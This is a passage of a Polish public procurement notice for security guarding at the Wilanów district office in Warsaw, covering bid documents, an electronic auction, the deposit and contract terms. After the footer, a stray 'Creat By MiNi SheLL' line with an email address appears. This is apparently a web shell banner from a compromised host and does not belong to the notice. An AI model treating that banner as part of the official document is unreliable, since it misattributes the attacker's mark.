również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy - wg wzoru stanowiącego Załącznik nr 5 do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> formularza oferty o treści zgodnej z założeniami SWZ. Wykonawca może złożyć JEDNĄ<br/>OFERTĘ, poprzez wypełnienie zdefiniowanego w systemie Formularza oferty.<br/>W przypadku ubiegania się o punkty w kryterium Liczba pracowników posiadających szkolenie przeciwpożarowe, Wykonawca zobowiązany jest:<br/>- do wykazania w ofercie liczby pracowników skierowanych do realizacji zamówienia posiadających szkolenie przeciwpożarowe oraz <br/>- do złożenia w Systemie wraz z ofertą cyfrowego odwzorowania zaświadczenia ukończenia szkolenia z obsługi centrali przeciwpożarowej odpowiednio poświadczonego, na potwierdzenie kwalifikacji pracownika skierowanego do realizacji zamówienia.<br/>2) Ponadto wraz z ofertą należy złożyć:<br/>a) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli<br/>dotyczy), z którego wynika, które usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy), o treści zgodnej ze wzorem stanowiącym Załącznik nr 2 do SWZ.<br/>b) Oświadczenie o podstawach wykluczenia wymienionych w art. 108 ust. 1 pkt 1, 2 i 5 (jeżeli<br/>dotyczy) o treści zgodnej ze wzorem stanowiącym Załącznik nr 4 do SWZ.<br/>W przypadku podmiotów występujących wspólnie oświadczenie składa każdy wykonawca.<br/>c) Dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np.<br/>pełnomocnictwo, odpis z właściwego rejestru, np. Krajowego Rejestru Sądowego, informacja o<br/>wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej<br/>Polskiej lub umowa spółki cywilnej, itp.), zgodnie z obowiązującymi przepisami;<br/>Pełnomocnictwo należy złożyć w jednej z poniższych postaci:<br/>- w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym przez osobę upoważnioną do reprezentowania Wykonawcy),<br/>- w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez<br/>osobę upoważnioną do reprezentowania Wykonawcy,<br/>- cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci papierowej<br/>poświadczonego przez mocodawcę, tj. podpisanego kwalifikowanym podpisem elektronicznym,<br/>podpisem osobistym lub podpisem zaufanym mocodawcy,<br/>- cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci papierowej<br/>poświadczonego przez notariusza, tj. podpisanego kwalifikowanym podpisem elektronicznym<br/>osoby posiadającej uprawnienia notariusza.<br/>d) Dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z<br/>której będzie wynikać przedmiotowe umocowanie, pełnomocnik może być ustanowiony do<br/>reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i<br/>zawarcia umowy.<br/>g) Zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>W przypadku gdy Wykonawca, w celu potwierdzenia spełnienia warunków udziału w<br/>postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>w ustawie. Wykonawca musi udowodnić Zamawiającemu, że realizując zamówienie będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając<br/>zobowiązanie tych podmiotów lub inny środek dowodowy - potwierdzające oddanie do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia (art. 118 ust. 3<br/>ustawy).<br/>Powyższy dokument należy przygotować wg wzoru stanowiącego Załącznik nr 8 do SWZ.<br/>W przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca zobowiązany jest do złożenia wraz z ofertą dowodów, o których mowa w pkt VII B SWZ.<br/>W przypadku przekazywania dokumentów elektronicznych stanowiących tajemnicę przedsiębiorstwa z wykorzystaniem Systemu, Wykonawca powinien w okienku dodawania pliku określić TYP DOKUMENTU jako „Tajemnica przedsiębiorstwa”. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> 1) W toku aukcji elektronicznej Wykonawcy za pomocą formularza umieszczonego na stronie internetowej, umożliwiającego wprowadzenie niezbędnych danych w trybie bezpośredniego połączenia z tą stroną, składają kolejne korzystniejsze postąpienia, podlegające automatycznej<br/>ocenie i klasyfikacji.<br/>2) Informacje dotyczące przebiegu aukcji elektronicznej:<br/>a) postąpienia, pod rygorem nieważności, składa się opatrzone bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.<br/>b) postąpienia składane w toku aukcji elektronicznej będą podlegały automatycznej ocenie i klasyfikacji zgodnie ze wzorem określonym w rozdziale 5 SWZ, z zastrzeżeniem że punktacja uwzględniać będzie również punkty przyznane danej ofercie w pozostałych kryteriach na etapie<br/>oceny ofert.<br/>c) oferta złożona przez wykonawcę przestaje wiązać, jeżeli złoży on korzystniejszą ofertę w toku aukcji.<br/>d) Zamawiający nie przewiduje zastosowania mechanizmu dogrywek.<br/>3) Zamawiający określa minimalne postąpienie w wysokości 2944,00 zł (słownie: dwa tysiące dziewięćset czterdzieści cztery zł 00/100).<br/>4) Warunkiem wzięcia udziału w aukcji elektronicznej jest dysponowanie bezpiecznym podpisem<br/>elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. Komputer<br/>użytkownika powinien spełniać wymagania określone w SWZ. Wykonawcy chcący wziąć udział w<br/>aukcji elektronicznej muszą się zalogować na platformie aukcyjnej za pomocą danych<br/>uwierzytelniających przekazanych przez operatora platformy aukcyjnej Wykonawcom, którym<br/>Zamawiający przekazał zaproszenie do udziału w aukcji elektronicznej.<br/>5) Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania:<br/>a) aukcja jednoetapowa,<br/>b) czas trwania aukcji: 30 minut.<br/>6) Aukcja elektroniczna zostanie zamknięta po upływie podstawowego czasu aukcji<br/>elektronicznej, tj. 30 minut.<br/>Pozostałe informacje dotyczące aukcji określone w SWZ. <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy zł 00/100) najpóźniej do dnia, w którym upływa ostateczny termin składania ofert do godz. 12:00.<br/>2.	Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>a)	pieniądzu, <br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836, 1572 ze zm.).<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa powyżej lit. b–d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto Zamawiającego (m.st. Warszawa Dzielnica Wilanów) nr 73 10301508 0000 0005 5001 6109 Bank Handlowy w Warszawie S.A., ul. Senatorska 16, 00-923 Warszawa z podaniem w tytule przelewu: „Przetarg nr 24/WAG/2021 – Ochrona osób i mienia obiektów Urzędu Dzielnicy Wilanów m.st. Warszawy <br/>przy ul. F. Klimczaka 2 i 4 w Warszawie” oraz dokładnej nazwy i adresu Wykonawcy. Kserokopię dowodu wpłaty należy dołączyć do oferty. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. spółka<br/>cywilna/konsorcjum)<br/>1. W przypadku składania oferty przez podmioty występujące wspólnie:<br/>a) podmioty występujące wspólnie zobowiązane są do ustanowienia Pełnomocnika<br/>reprezentującego ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>b) dokument potwierdzający umocowanie do reprezentowania należy dołączyć do oferty w<br/>formie oryginału lub cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci<br/>papierowej, poświadczonego zgodnie z obowiązującymi przepisami<br/>W/w dokument powinien zawierać w szczególności wskazanie:<br/> postępowania o zamówienie publiczne, którego dotyczy,<br/> wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,<br/> ustanowionego Pełnomocnika oraz zakresu jego umocowania;<br/>c) korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem,<br/>którego adres należy wpisać w formularzu oferty;<br/>d) Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy<br/>regulującej współpracę podmiotów występujących wspólnie;<br/>e) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu z powodu przesłanek, o których mowa w art. 108 ust. 1 i art. 109<br/>ust. 1 pkt 1) ustawy.<br/>Oświadczenia oraz dokumenty, składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie w zakresie jego dotyczącym. Dokumenty te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę postanowień umowy według wzoru umowy, stanowiącego<br/>załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-13 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-13 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Umowa zostanie zawarta z wybranym wykonawcą na warunkach określonych we wzorze umowy stanowiącym załącznik nr 7 do SWZ.<br/>1) Wykonawca, przed podpisaniem umowy, zobowiązany jest do wniesienia zabezpieczenia<br/>należytego wykonania umowy w wysokości 5% ceny ofertowej brutto.<br/>2) Wykonawca przedłoży kserokopię właściwej polisy ubezpieczeniowej, potwierdzonej za<br/>zgodność z oryginałem przez Wykonawcę, która stanowić będzie załącznik do Umowy.<br/>3) Wykonawca wskaże %-ową część zamówienia, jaką zamierza powierzyć podwykonawcy/om<br/>oraz nazwy, dane kontaktowe oraz przedstawicieli, podwykonawców zaangażowanych w<br/>realizację usług, jeżeli są już znani.<br/>4) Wykonawca złoży szczegółową kalkulacje stawki roboczogodziny – załącznik 11 do umowy<br/>5) Wykonawca przedstawi imienną listę pracowników - załącznik 5 do umowy<br/>6) W przypadku podmiotów występujących wspólnie Wykonawca dostarczy umowę regulującą<br/>współpracę tych podmiotów.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com